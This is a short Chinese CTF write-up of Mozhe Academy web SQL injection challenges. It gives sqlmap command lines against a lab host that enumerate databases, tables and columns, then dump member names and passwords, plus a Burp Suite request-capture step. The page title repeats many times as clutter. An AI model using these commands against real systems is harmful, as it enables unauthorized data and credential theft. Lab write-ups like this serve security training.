1、注入漏洞实战
burpsuite抓包 添加X-Forwarded-For:* 保存为.txt文件,放到sqlmap文件中 然后python sqlmap.py -r sql.txt --dbs -batch** 得到用户名和密码,登录得到flag墨者学院 web sql 注入题墨者学院 web sql 注入题2、布尔盲注
点开下面的通知,存在注入点
sqlmap.py -u http://219.153.49.228:49885/new_list.php?id=1 --current-dbB爆数据库
sqlmap.py -u http://219.153.49.228:49885/new_list.php?id=1 -D stormgroup --tables爆表
sqlmap.py -u http://219.153.49.228:49885/new_list.php?id=1 -D stormgroup -T member --columns爆字段
sqlmap.py -u http://219.153.49.228:49885/new_list.php?id=1 -D stormgroup -T member -C name,password --dump爆用户名和密码

密码需要md5解码,然后登录得到flag
墨者学院 web sql 注入题
墨者学院 web sql 注入题墨者学院 web sql 注入题墨者学院 web sql 注入题墨者学院 web sql 注入题墨者学院 web sql 注入题墨者学院 web sql 注入题墨者学院 web sql 注入题墨者学院 web sql 注入题3、报错盲注
与上题解题思路一样
墨者学院 web sql 注入题

相关文章: